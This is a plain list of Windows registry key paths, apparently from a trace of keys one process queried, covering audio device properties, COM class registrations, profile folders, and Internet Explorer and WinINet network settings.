HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Properties
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_Classes
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
